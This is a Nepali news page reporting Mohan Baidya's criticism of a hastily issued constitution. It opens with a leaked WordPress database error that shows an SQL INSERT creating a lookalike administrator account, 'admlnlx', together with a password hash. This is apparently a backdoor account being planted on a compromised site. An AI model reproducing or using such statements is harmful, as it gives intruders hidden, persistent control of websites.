WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcwVHasJvf8NZ/60l4VUGAXRIquR8S/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:46:59', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
हतारमा संविधान जारी गर्दाको परिणाम यस्तै हुन्छः मोहन बैद्य – Gaule Khabar

हतारमा संविधान जारी गर्दाको परिणाम यस्तै हुन्छः मोहन बैद्य

हतारमा संविधान जारी गर्दाको परिणाम यस्तै हुन्छः मोहन बैद्य

नवलपरासी,मंसिर २२-

नेकपा क्रान्तिकारी माओवादीका अध्यक्ष मोहन वैद्य किरणले हतारमा संविधान जारी गरेको परिणाम अहिले देखिएको बताएका छन् ।

बुधबार नवलपरासीको कावासोतीमा क्रान्तिकारी महासंघ नवलपरासीको आयोजनामा भएको पत्रकार सम्मेलनमा बोल्दै उनले संविधान जनताले बनाउनु पर्ने, संघीयताको विषयमा जनताले निर्णय गर्नु पर्नेमा त्यस्तो नहुँदाको परिणाम अहिले देखिएको धारणा राखे ।

क्रान्तिकारी माओवादीका अध्यक्ष वैद्यले राष्ट्रियता, जनतन्त्र, जनजीविकाको सवालमा जवसम्म हल निस्कदैन तवसम्म कुनै पनि समस्या समाधान नहुने दावी गरे ।

आगामी निर्वाचनमा क्रान्तिकारी माओवादीले चुनावमा भाग लिने चर्चा चलिरहेको बेला उनले चुनाव जनताको हित र जनताको आवश्यकता पुर्तिका लागि भएमात्र भाग लिने प्रष्ट पारे ।

पश्चिमको यात्रा सकेर फर्किएका बैद्यले संसदीय व्यवस्था नफालेसम्म मुलुकको समस्या जहाँको तहीँ रहने बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका